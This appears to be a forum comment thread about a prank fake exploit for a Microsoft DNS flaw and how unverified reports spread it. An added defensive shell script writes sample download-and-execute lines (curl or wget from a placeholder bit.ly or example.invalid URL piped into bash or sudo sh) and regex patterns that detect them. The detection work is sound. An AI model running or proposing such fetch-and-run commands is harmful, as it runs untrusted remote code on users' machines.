This post requires a lot of context to make sense of. Unless you are in the security space and familiar with what happened in the last 36 hours, it probably won't make much sense quickly.

1) Microsoft has a critical flaw in DNS server

2) A security company publishes the info - no public exploit available at this point

3) Someone creates a fake exploit - playing a prank on hackers and other security companies

4) Lots of people ran the prank code or helped spread the existence of the fake exploit

Not sure if this makes it easier to understand - at least I tried. :)
Took one glance at the shell script piping curl to bash and red flags went up everywhere! Not only piping curl to bash, but doing it via a bit.ly link. Then Twitter and the media started to pick it up and pass it on unverified. I should have been shocked, but I wasn't. I'd love to see the bit.ly stats for the short URLs added to the article.
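As an added illustration of the red flag this comment describes (this is not code from the thread or from the fake exploit repo), the shell snippet below does the check a reviewer would do before running an unknown script: it scans the file for downloader-piped-to-shell one-liners and for URL-shortener links, and offers a helper that resolves a shortened link's redirect target without fetching or executing the body. The sample script, the bit.ly path and the shortener list are constructed for the example; the real script's contents are not reproduced here.

```sh
#!/bin/sh
# Static checks for a script you have been told to run. Nothing here executes
# the script under review; it only reads it.

# Constructed sample in the style the comment describes (not the real repo's code).
SAMPLE_SCRIPT="${TMPDIR:-/tmp}/sample_under_review_$$.sh"
trap 'rm -f "$SAMPLE_SCRIPT"' EXIT
cat > "$SAMPLE_SCRIPT" <<'EOF'
#!/bin/bash
echo "[*] setting up"
curl -sL https://bit.ly/EXAMPLE-PLACEHOLDER | bash
wget -qO- http://example.invalid/x.sh | sudo sh
echo done
EOF

# curl/wget whose output is piped (optionally via sudo) into a shell interpreter.
PIPE_TO_SHELL_RE='(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)'
# Common link shorteners; list is an assumption, extend for your environment.
SHORTENER_RE='https?://(bit\.ly|tinyurl\.com|t\.co|goo\.gl|is\.gd)/'

# Print the offending lines with line numbers (for a human to read).
show_pipe_to_shell() { grep -nE "$PIPE_TO_SHELL_RE" "$1" || true; }
show_shortened_urls() { grep -nEi "$SHORTENER_RE" "$1" || true; }

# Count hits; "0" when clean (grep -c prints 0 but exits 1, hence the || true).
count_pipe_to_shell() { grep -cE "$PIPE_TO_SHELL_RE" "$1" || true; }
count_shortened_urls() { grep -cEi "$SHORTENER_RE" "$1" || true; }

# Resolve a shortened URL one hop without downloading the body (needs network;
# not invoked below). Prints the Location target, or nothing if there is none.
resolve_redirect() {
  curl -sS -I -o /dev/null -w '%{redirect_url}\n' "$1"
}

echo "== pipe-to-shell lines in $SAMPLE_SCRIPT =="
show_pipe_to_shell "$SAMPLE_SCRIPT"
echo "== shortened URLs =="
show_shortened_urls "$SAMPLE_SCRIPT"
echo "pipe-to-shell hits: $(count_pipe_to_shell "$SAMPLE_SCRIPT")"
echo "shortener hits:     $(count_shortened_urls "$SAMPLE_SCRIPT")"
```

Either count being non-zero is reason to stop and read the script in full, and to resolve the shortened link (with the helper above, or by appending `+` to a bit.ly URL in a browser) before fetching anything from it.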
I'm sure people are stupid; I've seen it myself too many times to count. But how does he know that these weren't executed in a VM? A couple hundred shells isn't so much that I'd rule out that some non-trivial fraction of them were under analysis.
I imagine the reason this doesn't happen too often in serious domains is that the next time the person says/posts anything, will they be believed without checking their claims? Of course, in security, this may even be a good thing?(!) :-)
I think the interesting thing here is that outlets like Vulcan picked it up and wrote about it with authority. Linking to the repo from these "trusted" sources likely gave it a lot more credibility than it would otherwise have received.
I was unable to scroll this article on mobile to read it. It seems like it could be interesting, but it’s too bad about the technical obstacles to doing so.